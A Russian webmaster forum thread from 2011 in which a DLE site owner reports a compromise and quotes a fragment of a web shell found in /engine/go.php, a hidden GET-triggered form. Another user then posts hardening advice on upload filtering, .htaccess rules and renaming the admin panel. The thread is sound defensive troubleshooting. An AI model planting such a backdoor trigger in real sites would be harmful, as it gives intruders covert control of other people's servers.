- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Все что нужно знать о DDоS-атаках грамотному менеджеру
И как реагировать на "пожар", когда неизвестно, где хранятся "огнетушители
Антон Никонов
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Здравствуйте! Че это такое? то сам index.php перестает работать (перезалил из бэкапа заработал), то какието 2 буквы в вверху сайта появились fg и нигде их найти не могу ни в шаблоне ни где, зашел в антивирус dle тоже не работает :gm: сайт: online-freebee.ru
DoctorSEO добавил 12.12.2011 в 17:29
Нашел шел в /engine/go.php
if(isset($_GET['tes'])) {
echo <<<HTML
<HTML><body><form action="" method="post">
<center><textarea name="text" rows="10" cols="100"></textarea>
<br /><input type="submit" value="Canoinoaaoe"/></center></form></body></HTML>
HTML;
Проверяйте свои сайты!!
DoctorSEO добавил 12.12.2011 в 18:57
Как в DLE защитится от шелов и прочей беды?
добавьте .htaccess в папки uploads и templates, пропишите в нем
потом найдите в файле engine/inc/files.php
фрагмент:
$allowed_extensions = array ("gif", "jpg", "png", "jpe", "jpeg" );$allowed_video = array ("avi", "mp4", "wmv", "mpg", "flv", "mp3", "swf", "m4v", "m4a", "mov", "3gp", "f4v" );
$allowed_files = explode( ',', strtolower( $config['files_type'] ) );
$img_result_th = "";
$img_result = "";
и замените его на:
$allowed_extensions = array ("gif", "jpg", "png", "jpe", "jpeg" );$allowed_video = array ("avi", "mp4", "wmv", "mpg", "flv", "mp3", "swf", "m4v", "m4a", "mov", "3gp", "f4v" );
$allow_conf = str_replace("php",md5(time() - rand(30,60)),strtolower( $config['files_type'] ));
$allowed_files = explode( ',', $allow_conf );
$img_result_th = "";
$img_result = "";
потом создайте .htaccess в папке backup и туда пропишите:
Переименуйте админку и файл admin.php
это защитит не только от шеллов но и от захайженных линков.
добавьте .htaccess в папки uploads и templates, пропишите в нем
потом найдите в файле engine/inc/files.php
фрагмент:
$allowed_extensions = array ("gif", "jpg", "png", "jpe", "jpeg" );$allowed_video = array ("avi", "mp4", "wmv", "mpg", "flv", "mp3", "swf", "m4v", "m4a", "mov", "3gp", "f4v" );
$allowed_files = explode( ',', strtolower( $config['files_type'] ) );
$img_result_th = "";
$img_result = "";
и замените его на:
$allowed_extensions = array ("gif", "jpg", "png", "jpe", "jpeg" );$allowed_video = array ("avi", "mp4", "wmv", "mpg", "flv", "mp3", "swf", "m4v", "m4a", "mov", "3gp", "f4v" );
$allow_conf = str_replace("php",md5(time() - rand(30,60)),strtolower( $config['files_type'] ));
$allowed_files = explode( ',', $allow_conf );
$img_result_th = "";
$img_result = "";
потом создайте .htaccess в папке backup и туда пропишите:
Переименуйте админку и файл admin.php
это защитит не только от шеллов но и от захайженных линков.
Спасибооооо! А какой скрипт могли загрузить через шел в go.php, шела удалил, а какойто скрипт остался(((